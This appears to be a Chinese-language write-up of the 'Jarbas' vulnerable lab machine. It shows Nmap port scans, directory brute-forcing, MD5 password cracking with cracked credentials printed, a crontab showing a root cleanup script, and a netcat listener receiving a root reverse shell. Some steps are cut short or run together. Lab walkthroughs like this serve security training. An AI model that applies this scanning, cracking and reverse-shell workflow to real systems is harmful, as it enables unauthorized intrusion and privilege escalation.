kali@kali [~/web_shell_toos] ➜ sudo nmap -sT -p- --min-rate 1000 192.168.41.138 [0:41:13] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-20 00:41 CST Nmap scan report for 192.168.41.138 Host is up (0.0010s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql 8080/tcp open http-proxy MAC Address: 00:0C:29:A5:68:07 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.10 seconds
kali@kali [~] ➜ sudo nmap -sT -sV -sC -p22,80,3306,8080 -O 192.168.41.138 [23:41:39] [sudo] kali 的密码: Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 23:42 CST Nmap scan report for 192.168.41.138 Host is up (0.00043s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA) | 256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA) |_ 256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-title: Jarbas - O Seu Mordomo Virtual! |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 | http-methods: |_ Potentially risky methods: TRACE 3306/tcp open mysql MariaDB (unauthorized) 8080/tcp open http Jetty 9.4.z-SNAPSHOT |_http-server-header: Jetty(9.4.z-SNAPSHOT) | http-robots.txt: 1 disallowed entry |_/ |_http-title: Site doesn't have a title (text/html;charset=utf-8). MAC Address: 00:0C:29:A5:68:07 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.58 seconds
80端口渗透
看了一下,没发现啥东西,先进行目录爆破吧
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
kali@kali [~] ➜ sudo dirsearch -u http://192.168.41.138 [0:40:29] [sudo] kali 的密码: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict
Using default input encoding: UTF-8 Loaded 3 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3]) Warning: no OpenMP support for this hash type, consider --fork=4 Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Warning: Only 9 candidates buffered for the current salt, minimum 24 needed for performance. Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:/usr/share/john/password.lst Proceeding with incremental:ASCII marianna (trindade) vipsu (eder) italia99 (tiago) 3g 0:00:02:21 DONE 3/3 (2025-02-20 00:54) 0.02114g/s 35986Kp/s 35986Kc/s 37262KC/s italia03..italien7 Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably Session completed.
We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things:
#1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. bash-4.2$ cat /etc/cortab cat /etc/cortab cat: /etc/cortab: No such file or directory bash-4.2$ cat /etc/crontab cat /etc/crontab SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root # For details see man 4 crontabs # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed */5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1 bash-4.2$
kali@kali [~] ➜ nc -lvnp 4444 [1:04:21] listening on [any] 4444 ... connect to [192.168.41.133] from (UNKNOWN) [192.168.41.138] 47144 bash: no job control in this shell [root@jarbas ~]# whoami whoami root